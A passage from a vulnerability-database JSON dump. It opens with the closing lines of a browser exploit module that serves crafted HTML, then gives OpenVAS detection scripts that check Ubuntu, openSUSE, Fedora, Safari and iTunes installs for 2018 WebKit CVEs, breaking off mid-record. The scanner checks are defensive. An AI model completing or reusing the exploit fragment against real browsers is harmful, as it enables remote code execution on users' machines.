html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/32828", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-19T00:00:00", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3687-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-12293", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843564", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843564", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3687_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for webkit2gtk USN-3687-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843564\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-19 06:01:01 +0200 (Tue, 19 Jun 2018)\");\n script_cve_id(\"CVE-2018-12293\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3687-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were discovered in the WebKitGTK+ Web and\nJavaScript engines. If a user were tricked into viewing a malicious\nwebsite, a remote attacker could exploit a variety of issues related to web\nbrowser security, including cross-site scripting attacks, denial of service\nattacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 18.04 LTS,\n Ubuntu 17.10,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3687-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3687-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.10|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.20.3-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.20.3-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.20.3-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.20.3-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.20.3-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.20.3-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:39:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-26T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:2285-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851975", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851975", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851975\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:24:51 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:2285-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2285-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-08/msg00031.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2018:2285-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.20.3 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain\n sensitive credential information that is transmitted during a CSS\n mask-image fetch (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (buffer overflow and\n application crash) via a crafted web site (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers an\n @generatorState use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages a\n getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation (bsc#1097693)\n\n - CVE-2018-4232: An unspecified issue allowed remote attackers to\n overwrite cookies via a crafted web site (bsc#1097693)\n\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1097693)\n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\n webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL,\n leading to an application crash (bsc#1095611).\n\n These non-security issues were fixed:\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies of about:blank\n page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-845=1\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-32bit-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-17T00:00:00", "type": "openvas", "title": "Fedora Update for webkit2gtk3 FEDORA-2018-118b9abf99", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4232"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874687", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874687", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_118b9abf99_webkit2gtk3_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkit2gtk3 FEDORA-2018-118b9abf99\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874687\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-17 06:06:02 +0200 (Sun, 17 Jun 2018)\");\n script_cve_id(\"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\",\n \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\", \"CVE-2018-11646\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkit2gtk3 FEDORA-2018-118b9abf99\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"webkit2gtk3 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-118b9abf99\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GY5NYBUZRNA46WQEP2XZCOJFY4BVEJ3X\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkit2gtk3\", rpm:\"webkit2gtk3~2.20.3~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-29T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2018-aac3ca8936", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4232"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874747", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874747", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_aac3ca8936_webkitgtk4_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2018-aac3ca8936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874747\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-29 10:56:18 +0200 (Fri, 29 Jun 2018)\");\n script_cve_id(\"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\",\n \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\", \"CVE-2018-11646\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2018-aac3ca8936\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-aac3ca8936\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Q6P4J4BQM66DFTDUIWVOVRVIB2AYST56\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.20.3~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-03T19:44:58", "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-06-04T00:00:00", "type": "openvas", "title": "Apple Safari Security Updates(HT208854)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4188", "CVE-2018-4205", "CVE-2018-4199", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4247", "CVE-2018-4232"], "modified": "2020-02-28T00:00:00", "id": "OPENVAS:1361412562310813509", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813509", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Security Updates(HT208854)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813509\");\n script_version(\"2020-02-28T13:41:47+0000\");\n script_cve_id(\"CVE-2018-4247\", \"CVE-2018-4205\", \"CVE-2018-4232\", \"CVE-2018-4246\",\n \"CVE-2018-4192\", \"CVE-2018-4188\", \"CVE-2018-4214\", \"CVE-2018-4201\",\n \"CVE-2018-4218\", \"CVE-2018-4233\", \"CVE-2018-4199\", \"CVE-2018-4190\",\n \"CVE-2018-4222\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 13:41:47 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-04 13:35:10 +0530 (Mon, 04 Jun 2018)\");\n script_name(\"Apple Safari Security Updates(HT208854)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A permissions issue in the handling of web browser cookies.\n\n - A type confusion issue in memory handling.\n\n - A race condition issue in locking.\n\n - A memory corruption issue in input validation.\n\n - A buffer overflow issue in memory handling.\n\n - Credentials were unexpectedly sent when fetching CSS mask images.\n\n - An out-of-bounds read issue in input validation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of will allow remote\n attackers to cause a denial of service, conduct spoofing attack, overwrite\n cookies, execute arbitrary code, crash Safari and leak sensitive data.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 11.1.1.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 11.1.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208854\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"11.1.1\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"11.1.1\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:04:16", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-06-06T00:00:00", "type": "openvas", "title": "Apple iTunes Security Updates(HT208852)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4225", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310813513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813513", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Security Updates(HT208852)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if 